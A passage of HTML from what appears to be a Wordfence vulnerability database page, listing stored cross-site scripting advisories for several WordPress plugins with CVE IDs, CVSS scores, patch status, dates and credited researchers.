		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7bf1d5a8-84b7-40e3-b258-eef599b64add" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5726db0a-2132-43d7-a0c9-6919e9e51bf6" target="_blank" rel="noopener">EventON – Events Calendar &lt;= 2.5.7 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81791" target="_blank" rel="noopener noreferrer">							CVE-2026-81791						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eventon-lite" target="_blank" rel="noopener">EventON – Events Calendar</a> <span class="wfvr-software-slug">[eventon-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/429c3eb56bea605e95a57ae93ae24c62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="429c3eb56bea605e95a57ae93ae24c62"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5726db0a-2132-43d7-a0c9-6919e9e51bf6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab58cd01-2d69-4711-a678-e15e9de7f616" target="_blank" rel="noopener">Featured Image with URL &lt; 1.0.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86780" target="_blank" rel="noopener noreferrer">							CVE-2026-86780						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/featured-image-with-url" target="_blank" rel="noopener">Featured Image with URL</a> <span class="wfvr-software-slug">[featured-image-with-url]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ab58cd01-2d69-4711-a678-e15e9de7f616" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fb99c935-947e-43a2-8291-c6a0724f8610" target="_blank" rel="noopener">Graphina &lt;= 3.1.11 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via &#8216;iq_tree_tree_chart_template&#8217; Widget Setting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13709" target="_blank" rel="noopener noreferrer">							CVE-2026-13709						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/graphina-elementor-charts-and-graphs" target="_blank" rel="noopener">Graphina – Charts and Graphs For Elementor</a> <span class="wfvr-software-slug">[graphina-elementor-charts-and-graphs]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fb99c935-947e-43a2-8291-c6a0724f8610" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49462bd9-ca61-4f43-9f29-4fa8773d14ef" target="_blank" rel="noopener">HT Menu – WordPress Mega Menu Builder for Elementor &lt; 1.2.7 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84935" target="_blank" rel="noopener noreferrer">							CVE-2026-84935						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-menu-lite" target="_blank" rel="noopener">HT Menu – WordPress Mega Menu Builder for Elementor</a> <span class="wfvr-software-slug">[ht-menu-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49462bd9-ca61-4f43-9f29-4fa8773d14ef" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4256381f-b21c-4f84-b66c-0fe1a52c81f0" target="_blank" rel="noopener">JCH Optimize &lt; 6.0.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84934" target="_blank" rel="noopener noreferrer">							CVE-2026-84934						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jch-optimize" target="_blank" rel="noopener">JCH Optimize</a> <span class="wfvr-software-slug">[jch-optimize]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4256381f-b21c-4f84-b66c-0fe1a52c81f0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f662888-c388-4191-bda9-b8a22d63cb3f" target="_blank" rel="noopener">LearnPress &lt;= 4.3.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;layout_custom_css&#8217;</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12230" target="_blank" rel="noopener noreferrer">							CVE-2026-12230						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</a> <span class="wfvr-software-slug">[learnpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d432fe617c91ad68889cf3ec76b46d4e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d432fe617c91ad68889cf3ec76b46d4e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala (Stranger825)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/589361e53213285d6f9cd95562a5756a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="589361e53213285d6f9cd95562a5756a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-matte" target="_blank" rel="noopener">Revanth Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9f662888-c388-4191-bda9-b8a22d63cb3f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cbb4f5a4-a693-4a05-813a-1fc189b3412c" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates &lt; 3.4.1 &#8211; Authenticated (Custom Role+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82847" target="_blank" rel="noopener noreferrer">							CVE-2026-82847						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</a> <span class="wfvr-software-slug">[learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cbb4f5a4-a693-4a05-813a-1fc189b3412c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6e45dc8a-b777-4a49-b1b1-c59ffa75f5b4" target="_blank" rel="noopener">Media Library Assistant &lt;= 3.35 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via Bulk Edit Preset Export/Import</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6642" target="_blank" rel="noopener noreferrer">							CVE-2026-6642						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">Media Library Assistant</a> <span class="wfvr-software-slug">[media-library-assistant]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d38c2bce8856249cf398ccf5a50ebe63.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d38c2bce8856249cf398ccf5a50ebe63"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener">TruongLV1 From FPT Night Wolf</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6e45dc8a-b777-4a49-b1b1-c59ffa75f5b4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13602c35-a0f7-4651-af9a-0be9e581893a" target="_blank" rel="noopener">Media Library Assistant &lt;= 3.35 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;mla_link_href&#8217; Shortcode Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6641" target="_blank" rel="noopener noreferrer">							CVE-2026-6641						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">Media Library Assistant</a> <span class="wfvr-software-slug">[media-library-assistant]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gidget-smith" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c8efd9cb349ced935be3ed3cedba2027.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c8efd9cb349ced935be3ed3cedba2027"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/gidget-smith" target="_blank" rel="noopener">gidget smith</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13602c35-a0f7-4651-af9a-0be9e581893a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ac0abf8e-6efd-4cf5-ad03-8442d892a35f" target="_blank" rel="noopener">Media Library Assistant &lt;= 3.35 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via mla_link_attributes Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-6640" target="_blank" rel="noopener noreferrer">							CVE-2026-6640						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">Media Library Assistant</a> <span class="wfvr-software-slug">[media-library-assistant]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dark-mode" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/99019555030c5f43e8795fe73e9d493c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="99019555030c5f43e8795fe73e9d493c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dark-mode" target="_blank" rel="noopener">normaandersonfrank</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ac0abf8e-6efd-4cf5-ad03-8442d892a35f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8c8beca2-d02b-4379-99e9-8090ef84ca6d" target="_blank" rel="noopener">My Calendar &lt;= 3.8.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;before&#8217; and &#8216;after&#8217; Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77187" target="_blank" rel="noopener noreferrer">							CVE-2026-77187						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/my-calendar" target="_blank" rel="noopener">My Calendar – Accessible Event Manager</a> <span class="wfvr-software-slug">[my-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8c8beca2-d02b-4379-99e9-8090ef84ca6d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62c8fb1f-6cba-43cc-8aca-70812c29a63d" target="_blank" rel="noopener">My Calendar &lt;= 3.8.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;fallback&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77186" target="_blank" rel="noopener noreferrer">							CVE-2026-77186						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/my-calendar" target="_blank" rel="noopener">My Calendar – Accessible Event Manager</a> <span class="wfvr-software-slug">[my-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/62c8fb1f-6cba-43cc-8aca-70812c29a63d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8c7e79-00c4-4667-9ef6-e988901bb6a0" target="_blank" rel="noopener">myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program &lt;= 3.2.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;wrapper&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17149" target="_blank" rel="noopener noreferrer">							CVE-2026-17149						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mycred" target="_blank" rel="noopener">Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred</a> <span class="wfvr-software-slug">[mycred]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9d8c7e79-00c4-4667-9ef6-e988901bb6a0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fc5b0f8f-2623-4d89-b78b-8dcc7289e306" target="_blank" rel="noopener">Orbit Fox &lt;= 3.0.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
